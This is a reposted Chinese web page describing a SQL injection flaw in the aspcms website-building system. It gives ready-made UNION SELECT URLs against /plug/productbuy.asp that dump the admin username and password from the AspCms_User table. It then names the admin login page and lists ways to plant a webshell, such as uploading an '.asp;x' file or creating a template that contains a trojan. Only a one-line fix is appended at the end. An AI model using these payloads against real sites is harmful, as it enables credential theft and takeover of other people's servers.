• 爱情文章
  • 亲情文章
  • 友情文章
  • 生活随笔
  • 校园文章
  • 经典文章
  • 人生哲理
  • 励志文章
  • 搞笑文章
  • 心情日记
  • 英语文章
  • 范文大全
  • 作文大全
  • 新闻阅读
  • 当前位置: 山茶花美文网 > 校园文章 > 正文

    aspcms企业建站系统0day漏洞介绍_鑫迪建站

    时间:2020-02-18来源:山茶花美文网 本文已影响 山茶花美文网手机站

    漏洞出现在

    /plug/productbuy.asp

    对接收的参数id没有进行过滤而导致的注入漏洞

    注入后的页面有跳转,所以要快,建议用快捷键复制

    爆用户名

    /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,

    26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

    这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........

    爆密码

    /plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,

    26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

    后台登录地址:/admin/login.asp

    后台拿shell

    1、直接上传.asp;x

    2、系统配置信息

    3、模版管理新建1.asp模板,内容写马的内容.

    修复方法: id用cint(request("id"))

    • aspcms企业建站系统0day漏洞介绍_鑫迪建站 相关文章:
    • 爱情文章
    • 亲情文章
    • 友情文章
    • 随笔
    • 哲理
    • 励志
    • 范文大全